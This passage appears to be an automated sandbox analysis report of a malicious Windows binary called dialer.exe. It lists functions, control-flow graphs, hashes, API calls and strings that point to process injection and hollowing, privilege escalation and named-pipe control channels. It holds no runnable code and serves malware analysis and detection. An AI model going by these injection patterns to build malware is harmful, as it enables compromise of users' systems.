VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                                                                          Callgraph

                                                                          Executed Functions

                                                                          Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                          • API String ID: 4177739653-1130149537
                                                                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                                          Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab CloseHandle 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                          • API String ID: 2561231171-3753927220
                                                                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                                          Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                          • String ID:
                                                                          • API String ID: 4084875642-0
                                                                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                                          Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                          • String ID:
                                                                          • API String ID: 3197395349-0
                                                                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                                          Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                          • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                            • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                            • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 000000014000163D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                            • Part of subcall function 00000001400014D8: HeapFree.KERNEL32 ref: 0000000140001651
                                                                          • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                          • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                                          • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                          • String ID:
                                                                          • API String ID: 1323846700-0
                                                                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                                          Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                          • String ID: .text$C:\Windows\System32\
                                                                          • API String ID: 2721474350-832442975
                                                                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                                          Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                          • String ID: M$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2203880229-3489460547
                                                                          • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                          • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                          • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                          • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                                          Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 2071455217-3440882674
                                                                          • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                          • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                          • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                          • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                                          Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                          • String ID:
                                                                          • API String ID: 3676546796-0
                                                                          • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                          • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                          • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                          • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                                          Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb CloseHandle 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CloseHandleOpenWow64
                                                                          • String ID:
                                                                          • API String ID: 10462204-0
                                                                          • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                          • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                          • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                          • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                                          Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                                          APIs
                                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                            • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                            • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                            • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                            • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                            • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                            • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                            • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                            • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                            • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                            • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                            • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                            • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                            • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                            • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                          • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                                          • String ID:
                                                                          • API String ID: 3836936051-0
                                                                          • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                          • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                          • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                          • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                          Non-executed Functions

                                                                          Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000019.00000002.2125416345.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000019.00000002.2125325177.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125474691.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000019.00000002.2125510606.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                          Similarity
